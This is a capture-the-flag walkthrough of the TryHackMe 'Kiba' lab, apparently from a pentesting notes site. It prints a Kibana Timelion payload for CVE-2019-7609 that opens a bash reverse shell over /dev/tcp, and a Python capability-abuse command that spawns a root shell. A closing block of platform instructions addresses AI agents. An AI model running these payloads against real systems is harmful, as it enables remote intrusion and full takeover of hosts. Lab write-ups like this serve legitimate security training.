> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/kiba.md).

# Kiba

## Nmap

```
sudo nmap 10.10.176.245 -p- -sS -sV                                           

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))
5044/tcp open  lxi-evntsvc?
5601/tcp open  esmagent?
```

Port 80 takes us to the following:

![http://10.10.176.245/index.html](/files/-MVHbOPCX-Qmg8aok93H)

The sentance is a possible hint for later regarding capabilities. Otherwise I was unable to enumerate further interesting directories with Gobuster.

On port 5601 we have Kibana installed.

![http://10.10.176.245:5601/app/kibana#/home?\_g=()](/files/-MVHbiY7Jf3E9YNG0pQZ)

Checking the management pane shows we are running on version 6.5.4

![http://10.10.176.245:5601/app/kibana#/management?\_g=()](/files/-MVHbuV8HbcoliwTVZzp)

Research related exploits we come across a RCE exploit that effect versions prior to 6.6.

{% embed url="<https://github.com/mpgn/CVE-2019-7609>" %}

As per the exploit head over to the Timelion pane in Kibana and paste the following payload:

```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

Swapping out the IP and port where required.

![](/files/-MVHeCTBqk4CF0mY7cNC)

Hit run and then proceed to the 'Canvas' pane. Shortly after we should recieve a shell back on our netcat listener.

![](/files/-MVHe_5ZUctBnGDXrpOU)

From here we can check all capabilities with:

```
getcap -r / 2>/dev/null

/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
```

This reveals a python binary in /home/kiba/.hackmeplease. We can run the following command to launch a Python shell as root.

```
home/kiba$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

![](/files/-MVHnSr92TQ04ln67mGT)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/kiba.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.